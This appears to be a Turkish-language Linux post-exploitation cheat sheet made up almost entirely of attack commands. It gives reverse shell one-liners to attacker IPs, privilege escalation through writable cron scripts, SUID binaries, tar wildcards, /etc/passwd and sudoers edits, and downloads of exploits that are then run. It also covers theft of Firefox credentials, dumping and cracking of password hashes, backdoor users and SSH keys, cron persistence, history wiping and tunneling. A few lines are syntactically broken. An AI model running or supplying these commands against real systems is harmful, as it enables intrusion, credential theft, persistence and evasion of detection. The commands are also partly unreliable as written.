Linux Post Exploitation

Kullanıcı ve Gruplar

id # Kullanıcı ve grup
cat /etc/passwd # Kullanıcılar
env # Ortam Değişkenleri
cat .bashrc

Sistem Bilgileri

hostname # Hostname
uname -a # Kernel Versiyon
cat /etc/os-release
cat /etc/issue
dpkg -l # Uygulamalar

# Mount edilmiş dizinler
cat /etc/fstab
mount

# Bütün diskler
lsblk

# Modül ve Driverlar
lsmod
/sbin/modinfo libata

grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama
find / -name flag.txt 2>/dev/null # Dosya Arama

Process Bilgileri

ps aux

Ağ Bilgileri

# Ağ Arayüzleri
ip a
ifconfig a

# Açık Portlar
netstat -punta
ss -ntpul

# Yönlendirme Tablosu
route
cat /etc/networks
ip route

# Firewall Ayarları
cat /etc/iptables/rules.v4

# Localde Gelen Parolalar
sudo tcpdump -i lo -A | grep "pass"

cat /etc/hosts # Hosts dosyası
cat /etc/resolv.conf # DNS dosyası

CronJobs

ls -lah /etc/cron* # Cronjob Listesi
cat /var/spool/cron/crontabs/root # Root Crontab
crontab -l # Kullanıcının Cronjob Listesi
sudo crontab -l # Root Cronjob Listesi
grep "CRON" /var/log/syslog # Sistem Loglarında Cronjob Arama

# Bütün Cronjoblar
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

# Reverse Shell Exploit
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh

# Root Shell Exploit
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/john/backup.sh
/tmp/bash -ip

# Sudo Yetkisi ile Exploit
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh

World Writable Dosyalar

find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null

# Eğer /etc/passwd var ise root kullanıcı ekleyebiliriz
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

SUID Binary

find / -perm -4000 2>/dev/null

# Aşağıdaki Dosyalar Normal
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount

# Veya SUID ile işaretlenmiş bir dosya bizim değiştirebildiğimiz bir dosyayı kullanıyorsa
ls -la backup.sh # SUID Olan Dosya
ls -la backup.config # SUID Olan Dosyanın Çağırdığı Dosya

cp /bin/bash > backup.config
./backup.sh

SUDO

Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.

sudo -l

# NOPASSWD:ALL ROOT olan bir sh dosyası varsa shell alabiliriz
sudo /usr/bin/backup.sh -c /bin/bash

Binary Capabilities

GTFOBins: https://gtfobins.github.io/

/usr/sbin/getcap -r / 2>/dev/null

Wildcard Exploit

Eğer bir cronjob'da * karakteri varsa aşağıdaki exploit uygulanabilir.

echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
grep "echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip

Automated

# Local
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80

# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check

chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check

./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt

Reverse Shell

# Basit Listener
nc -lvnp 9001 
# Otomatik Listener
pwncat-cs -p 9001


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.1.2 9001 >/tmp/f
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.2/9001 0>&1'
echo "<BASE64_REV>"|base64${IFS}-d|bash

Shell Upgrade

# Python varsa
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Python yoksa
script /dev/null -qc /bin/bash

# Sonrasında
CTRL + Z

stty size # Buradaki değeri altta giriyoruz
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset;

Firefox Creds

Decrypter: https://github.com/unode/firefox_decrypt

cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db
cat /root/.mozilla/firefox/x.default-esr/logins.json

Dosya Transferi

# Local
python3 -m http.server 80
updog 80

# Hedef
cd /tmp
wget http://192.168.1.3/LinEnum.sh

# Netcat ile
nc -lvnp 1234 > file.txt
nc -w 3 192.168.1.3 1234 < file.txt

Kernel Exploit

cat /etc/issue
uname -r

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80

wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995

SSH Persistence

# Eğer id_rsa yoksa
ssh-keygen

scp root@192.168.1.3:~/.ssh/id_rsa .
chmod 600 id_rsa
ssh root@192.168.1.3 -i id_rsa

ssh-keygen # Kali'de ssh key oluştur
cat /root/.ssh/id_rsa.pub

echo 'xxxxxxxxxxxxxx'>/root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

User Persistence

useradd  -m -s /bin/bash hacker
usermod -aG sudo hacker
passwd hacker

ssh hacker@192.168.1.3

Cron Persistence

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<IP>/1234 0>&1'" > cron
crontab -i cron
crontab -l

Hash Dumping

Eğer hedef makinede root kullanıcı isek aşağıdaki komut ile bütün kullanıcıların hash değerlerini görebiliriz.

cat /etc/shadow


john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt

ssh2john id_rsa > ssh.hash
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'

History Silme

history -c
cat /dev/null > ~/.bash_history

Port Forwarding

# Aynı ağdaki 22 portu açık olan servisi kendi portuna yönlendirir
socat -ddd TCP-LISTEN:2222,fork TCP:192.168.1.4:22

ssh 192.168.1.3 -p 2222

SSH Tunneling

# Local port forwarding
ssh -N -L 0.0.0.0:2222:172.16.1.4:22 root@192.168.1.3
ssh root@192.168.1.3 -p 2222

# Dynamic Port Forwarding
ssh -N -D 0.0.0.0:9999 root@192.168.1.3

mousepad /etc/proxychains4.conf
socks5 192.168.1.3 9999

proxychains nmap -v -sT -Pn 172.168.1.3

# Remote Port Forward
systemctl start ssh
ssh -N -R 127.0.0.1:2222:10.4.50.215:22 root@192.168.1.2
ssh 127.0.0.1 -p 2222

# Remote Dynamic Port Forward
ssh -N -R 9999 root@192.168.1.2

mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999

proxychains nmap -v -sT -Pn -n 172.168.1.3

# SShuttle
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24

HTTP Tunneling

# https://github.com/jpillora/chisel/releases
python -m http.server 80
chisel server --port 8081 --reverse

wget http://192.168.1.2/chisel -O /tmp/chisel && chmod +x /tmp/chisel
/tmp/chisel client 192.168.1.3:8081 R:socks &> /tmp/output
mousepad /etc/proxychains4.conf
#socks5 127.0.0.1 1080


# Ligolo
./proxy -selfcert -laddr 0.0.0.0:443
./agent -ignore-cert -connect 192.168.1.2:443

DNS Tunneling

mousepad dnsmasq.conf
# Do not read /etc/resolv.conf or /etc/hosts
no-resolv
no-hosts

# Define the zone
auth-zone=feline.corp
auth-server=feline.corp

# TXT record
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.


dnsmasq -C dnsmasq.conf -d


# Local
dnscat2-server feline.corp
cp /usr/bin/dnscat .
python -m http.server 80

# Hedef
wget http://192.168.1.2/dnscat -O /tmp/dnscat && chmod +x /tmp/dnscat
/tmp/dnscat feline.corp

window -i 1
listen 0.0.0.0:4455 172.16.2.4:445
